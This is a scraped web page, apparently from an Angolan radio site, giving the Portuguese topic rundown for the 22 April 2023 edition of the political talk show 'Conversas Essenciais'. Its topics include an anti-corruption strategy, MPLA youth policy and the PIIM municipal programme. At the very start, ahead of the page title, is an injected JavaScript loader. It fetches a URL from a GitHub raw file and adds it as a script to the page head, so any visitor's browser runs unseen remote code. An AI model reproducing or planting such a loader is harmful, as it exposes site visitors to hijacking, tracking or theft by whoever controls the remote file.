;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Conversas Essenciais - Edição de 22 de Abril de 2023 | RadioPlayDigital
Conversas Essenciais - Edição de 22 de Abril de 2023

CONVERSAS ESSENCIAS, EDIÇAO 22 ABRIL 2023

Participantes :

1. Fernando Pacheco( agrónomo e comentador da Política Nacional)
2. Cláudio Silva (analista político e empreendedor)
3. Rafael Marques
4. Graça Campos
5. Teixeira Cândido (moderador)

1. A Procuradoria Geral da República apresentou terça-feira as linhas gerais da Estratégia Nacional de Prevenção e Repressão da Corrupção, que vai a consulta pública até dia 18. Os angolanos têm menos de um mês para se pronunciarem sobre a matéria. Ora, não havendo nenhuma estratégia nacional, em quê pilares assenta aquilo que, desde 2018, é descrito como luta contra a corrupção?
Estamos diante da máxima de que, mais uma vez, a carroça se adiantou aos bois?

2. Esta semana, o jornalista e activista Rafael Marques, membro do painel residente deste programa, deu entrada, na Procuradoria Geral da República, de uma denúncia criminal contra o presidente do Tribunal Supremo, Joel Leonardo.
3. O Comité Central do MPLA reuniu terça-feira para debater o “Impacto de Políticas Públicas na vida da Juventude”. O MPLA está no poder há ininterruptos 48 anos e em Setembro deste ano o Presidente João Lourenço completará o sexo ano consecutivo. O Partido que governa o País nunca teve políticas públicas com foco na juventude ou a reunião de terça-feira é uma atabalhoada resposta ao êxodo de jovens a procura de nocas oportunidades?
Por outro lado, políticas públicas estruturantes não produzem efeitos imediatos. De quê forma o Executivo pode estancar esse êxodo?
Além de que, politicas públicas para a juventude não podem ser definidas exclusivamente por um partido. A definição dessas políticas requer o envolvimento de toda a sociedade, a começar pelos próprios jovens. Não podem ser apenas os jovens da JOTA MPLA ou os jovens que estão no Comité Central do MPLA a definir o que é bom ou não para toda a juventude angolana.

4. O Programa Integrado de Integrado de Intervenção nos Municípios (PIIM) é um dos instrumentos com que o MPLA acena aos jovens.
No dia 27 de Junho de 2019 quando o lançou o Presidente da República disse que o PIIM previa a construção de raiz ou a conclusão de obras por concluir, de cerca de quatro mil salas de aulas para vários níveis de ensino; no domínio da saúde o Programa previa a construção, reabilitação e apetrechamento de cerca de 200 equipamentos hospitalares de diferentes categorias em vários municípios. Disse, ainda, que as vias de comunicação seriam, igualmente, um domínio contemplado pelo PIIM, estando previstas “a asfaltagem ou terraplanagem de vias e a reabilitação de estradas, sobretudo de vias secundárias e terciárias, sendo importante que sejam privilegiadas vias que facilitem o escoamento da produção agrícola do campo, incentivando assim o aumento da produção, o aumento do emprego e o desenvolvimento local”.
Por razões profissionais ou outras, o Engº Agrónomo Fernando Pacheco e o Jornalista Jaime Azulay têm viajado muito pelo interior do País. Ambos podem partilhar connosco o que os seus olhos têm visto. O PIIM mudou ou não a vida nos municípios?
5. Notas da semana.
A) áudio do Capapinha
B) Notas soltas (graça Campos e…)

 

Data de Emissão: 22-04-2023 às 00:00
PARTICIPANTES
PUB RADIO PLAY

Relacionados